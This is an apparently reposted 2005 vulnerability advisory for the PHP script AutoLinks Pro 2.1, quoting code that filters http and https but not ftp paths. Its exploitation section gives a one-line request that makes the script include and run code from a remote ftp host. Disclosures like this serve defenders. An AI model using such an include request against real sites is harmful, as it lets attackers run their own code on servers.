by r0t,der4444,cembo,VietMafia

Wednesday, August 31, 2005

AutoLinks Pro 2.1 Remote PHP File Include Vulnerability


Software: AutoLinks Pro
Version: 2.1
Type: Remote PHP File Include Vulnerability
Risc: High

Date: 16.08.05
Vendor: ScriptsCenter
Page: http://www.scriptscenter.com/

Credit:
=======
Credit goes to NewAngels Team and especially 4Degrees.

Description:
============
"AutoLinks 2.1 is a full-featured script making life easier for webmasters
relying extensively on link exchanges to bring traffic to their site. Other
webmasters are able to easily exchange links with you, bringing more visitors
to your site and you also have full control on what sites you want to link."
[Quote from http://www.scriptscenter.com/]

PHP Requirements:
=================
register_globals = On

Vulnerability:
=============
Related source from file "autolinks/al_initialize.php":

>// check for hacking attempt
>if(strstr($alpath,"http://") || strstr($alpath,"https://")) exit("Invalid \$alpath variable");
>
>include($alpath."al_functions.php");

The script does not check wether $alpath contains an absolute URL to a remote
ftp resource.

Exploitation:
=============
/al_initialize.php?alpath=ftp://host.com/

The code in "al_functions.php" will be executed.


autors musu pashu vien der4444, tik vareja sheit atrak publicet ,isak sakot pec paris dienam apsolijas publicet jaunu/as

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew